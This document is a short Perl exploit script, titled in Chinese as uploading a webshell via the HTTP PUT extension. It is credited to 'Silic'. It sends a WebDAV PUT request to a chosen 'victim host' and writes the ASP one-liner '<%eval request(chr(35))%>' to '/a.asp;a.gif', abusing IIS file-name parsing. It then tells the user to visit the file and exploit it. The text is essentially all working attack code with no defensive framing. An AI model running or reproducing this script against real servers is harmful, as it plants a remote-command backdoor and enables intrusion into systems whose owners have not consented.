HTTP PUT扩展协议上传webshell

put.pl
#!/usr/bin/perl
use
IO::Socket;
 
use Getopt::Std;
getopts('h:', \%args);
 
if (defined($args{'h'})) 
{
	$host = $args{'h'};
}
print STDERR "-=[ Coded by Silic ]=-\n\n";
 
if (!defined($host)) 
{
Usage();
}
 
$buffer = 100000;
$socket = new IO::Socket::INET (PeerAddr => "$host",
 PeerPort => 80,
 Proto => 'tcp');
die  unless $socket;
$req = "PUT /a.asp;a.gif HTTP/1.0\r\n";
$leng = "Accept-Language: en-us;q=0.5\r\n";
$tran = "Translate: f\r\n";
$con = "Content-Length:26\r\n";
$user = "User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1\r\n";
$hosting = "Host: $host\r\n\r\n";
$msg = '<%eval request(chr(35))%>';
$data = $req.$leng.$tran.$con.$user.$hosting.$msg;
send ($socket,$data,0);
print "Visit to http://$host/a.asp;a.gif and Exploit it!";
close;
 
sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
	exit;
}